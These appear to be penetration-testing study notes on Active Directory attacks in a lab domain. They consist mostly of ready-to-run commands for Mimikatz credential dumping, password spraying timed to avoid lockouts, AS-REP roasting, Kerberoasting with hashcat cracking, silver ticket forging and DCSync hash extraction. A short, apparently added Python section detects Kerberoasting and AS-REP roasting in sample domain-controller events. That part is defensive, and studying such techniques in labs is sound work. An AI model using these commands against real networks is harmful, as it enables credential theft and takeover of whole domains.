Cached AD Credentials
Run PowerShell as Administrator, then run Mimikatz with its standard setup:
PS C:\Users\stephanie> .\mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords
PS C:\Users\stephanie> dir \\web04.corp.com\backup
# Accessing a share requests a service ticket, which then shows up in the ticket dump below
mimikatz> sekurlsa::tickets
Password Attacks
View account policy
PS C:\Users\stephanie> net accounts
# Lockout threshold = N: up to N-1 failed attempts per account are safe before it locks out
# Lockout observation window = N minutes: the failed-attempt counter resets after this, so wait that long before the next round
PS C:\Users\stephanie> powershell -ep bypass
PS C:\Users\stephanie> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
kali@kali:~$ crackmapexec smb <TARGET_IP> -u <USER/USERLIST.txt> -p "Nexus123!" -d corp.com --continue-on-success
# "(Pwn3d!)" in the output means the account has local admin privileges on that target
PS C:\Users\stephanie> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
kali@kali:~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali:~$ ./kerbrute_linux_amd64 userenum /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt --dc <dc-ip> --domain <domain>
kali@kali:~$ ./kerbrute_linux_amd64 userenum /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt --dc <dc-ip> --domain <domain>
AS-REP Roasting
AS-REP on Kali with impacket-GetNPUsers
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.149.70 -request -outputfile hashes.asreproast corp.com/pete
# Use the domain controller IP; the target is given as domain/user and the password is prompted for afterwards
PS C:\Users\stephanie> .\Rubeus.exe asreproast /nowrap
# Automatically identifies vulnerable user accounts
kali@kali:~$ sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
PS C:\Users\stephanie> powershell -ep bypass
PS C:\Users\stephanie> Import-Module .\PowerView.ps1
PS C:\Users\stephanie> Get-DomainUser -PreauthNotRequired | select name
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.149.70 corp.com/pete
Kerberoasting
Kerberoasting using Rubeus (Windows)
PS C:\Users\stephanie> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
# Automatically identifies all SPNs linked to domain user accounts, e.g. iis_service
kali@kali:~$ sudo impacket-GetUserSPNs -request -dc-ip 192.168.149.70 -outputfile hashes.kerberoast corp.com/pete
# Use the domain controller IP; if the error "Clock skew too great" appears, sync the Kali machine's time with the DC using ntpdate or rdate
kali@kali:~$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
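Both the AS-REP roasting and Kerberoasting sections above leave traces on the domain controller: RC4-encrypted (0x17) TGS requests (event 4769) for user-account SPNs, and TGT requests (event 4768) with pre-authentication type 0. The script below is an added defender-side example, not part of the original notes; it runs over constructed sample events in a simplified key=value form and flags both patterns.

```python
# Added defender-side example (not part of the original notes): flag Kerberoasting
# and AS-REP roasting indicators in Domain Controller security events. The event
# records below are constructed samples in a simplified key=value form, not real logs.
from collections import defaultdict

SAMPLE_EVENTS = [
    "EventID=4769 Account=pete@CORP.COM Service=iis_service TicketEncryptionType=0x17 Status=0x0 Ip=192.168.149.50",
    "EventID=4769 Account=pete@CORP.COM Service=sql_service TicketEncryptionType=0x17 Status=0x0 Ip=192.168.149.50",
    "EventID=4769 Account=pete@CORP.COM Service=WEB04$ TicketEncryptionType=0x12 Status=0x0 Ip=192.168.149.50",
    "EventID=4769 Account=jeff@CORP.COM Service=krbtgt TicketEncryptionType=0x17 Status=0x0 Ip=192.168.149.51",
    "EventID=4768 Account=dave Service=krbtgt TicketEncryptionType=0x17 PreAuthType=0 Status=0x0 Ip=192.168.149.50",
]

RC4 = "0x17"  # RC4-HMAC; AES ticket types (0x11/0x12) are far harder to crack offline

def parse(line):
    """Turn one 'key=value key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split())

def kerberoast_suspects(events, min_services=2):
    """Accounts that pulled RC4 TGS tickets for >= min_services distinct user-account
    SPNs. Computer accounts ($) and krbtgt are excluded: they are not typical targets."""
    services = defaultdict(set)
    for e in map(parse, events):
        if e["EventID"] != "4769" or e["TicketEncryptionType"] != RC4 or e["Status"] != "0x0":
            continue
        svc = e["Service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        services[e["Account"]].add(svc)
    return {acct: sorted(s) for acct, s in services.items() if len(s) >= min_services}

def asrep_suspects(events):
    """4768 TGT requests with pre-authentication type 0 (none) and an RC4 ticket:
    the AS-REP is crackable offline, so the account has 'Do not require pre-auth' set."""
    return sorted({e["Account"] for e in map(parse, events)
                   if e["EventID"] == "4768" and e.get("PreAuthType") == "0"
                   and e["TicketEncryptionType"] == RC4 and e["Status"] == "0x0"})

if __name__ == "__main__":
    print("kerberoast:", kerberoast_suspects(SAMPLE_EVENTS))
    print("asrep:", asrep_suspects(SAMPLE_EVENTS))
```

On real data, feed the fields from the Windows event XML (Ticket Encryption Type, Pre-Authentication Type, Service Name) into the same functions; a single account requesting many RC4 service tickets in a short window is the strongest signal.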
Silver Tickets
Requires: SPN Password Hash, Domain SID, Target SPN
# Get the iis_service user's NTLM hash via Mimikatz
mimikatz> privilege::debug
mimikatz> sekurlsa::logonpasswords
PS C:\Users\jeff> whoami /user
# The domain SID is this output with the user's RID removed (drop the final "-NNNN" component)
mimikatz> kerberos::golden /sid:<DOMAIN_SID> /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:<SPN_NTLM_HASH> /user:jeffadmin
# /user: an existing domain user to impersonate; the forged ticket grants that user's access to the service
PS C:\Users\stephanie> klist
PS C:\Users\stephanie> iwr -UseDefaultCredentials http://web04
DCSync Attack
Use Mimikatz to run a DCSync attack and fetch a user's NTLM hash (requires an account with directory replication rights, such as a Domain Admin)
mimikatz> lsadump::dcsync /user:corp\dave
# Able to obtain any user password hash in the domain, even Administrator
kali@kali:~$ impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"PASSWORD"@192.168.149.70
# -just-dc-user = Target username
# Credential format = domain/user:password@DC_IP